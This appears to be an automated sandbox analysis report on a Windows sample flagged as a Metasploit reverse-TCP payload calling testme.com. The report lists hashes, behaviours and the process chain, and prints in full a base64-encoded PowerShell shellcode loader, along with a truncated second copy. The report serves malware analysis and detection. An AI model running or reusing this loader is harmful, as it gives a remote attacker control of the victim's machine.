Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
22-06-2024 21:48
Static task
static1
Behavioral task
behavioral1
Sample
03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
Resource
win10v2004-20240611-en
General
-
Target
03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
-
Size
457KB
-
MD5
03f9fd2ed89de09d2dbed8de06f8fe76
-
SHA1
4abfa12b785713bcb8a8d07175114dc903196fc3
-
SHA256
ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624
-
SHA512
f11a7029308abaa10f5b5cda1c04997f24d3e275b101533a15aa74645b05ed102f448002bfdeb2df86ca6651ab707eaa20fa1e1835851dc18754b2fdeb9ff1d3
-
SSDEEP
6144:x9JLFprEWDl7s5t38dX6pKE4dU7kpoTcnFOHuln+Otc+EkzI8jSejCE8aKP3sGvt:x99gbP/GFK9ACwdag/2OuV8IRCg
Malware Config
Extracted
metasploit
encoder/shikata_ga_nai
Extracted
metasploit
windows/reverse_tcp_dns
testme.com:80
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 24 5004 powershell.exe 24 5004 powershell.exe 24 5004 powershell.exe 24 5004 powershell.exe 24 5004 powershell.exe 24 5004 powershell.exe 24 5004 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1988 powershell.exe 3644 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3644 powershell.exe 3644 powershell.exe 1988 powershell.exe 1988 powershell.exe 5004 powershell.exe 5004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3644 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 5004 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exepowershell.exepowershell.exepowershell.execsc.exedescription pid process target process PID 720 wrote to memory of 3644 720 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe powershell.exe PID 720 wrote to memory of 3644 720 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe powershell.exe PID 720 wrote to memory of 3644 720 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe powershell.exe PID 3644 wrote to memory of 1988 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 1988 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 1988 3644 powershell.exe powershell.exe PID 1988 wrote to memory of 5004 1988 powershell.exe powershell.exe PID 1988 wrote to memory of 5004 1988 powershell.exe powershell.exe PID 1988 wrote to memory of 5004 1988 powershell.exe powershell.exe PID 5004 wrote to memory of 4484 5004 powershell.exe csc.exe PID 5004 wrote to memory of 4484 5004 powershell.exe csc.exe PID 5004 wrote to memory of 4484 5004 powershell.exe csc.exe PID 4484 wrote to memory of 4776 4484 csc.exe cvtres.exe PID 4484 wrote to memory of 4776 4484 csc.exe cvtres.exe PID 4484 wrote to memory of 4776 4484 csc.exe cvtres.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAw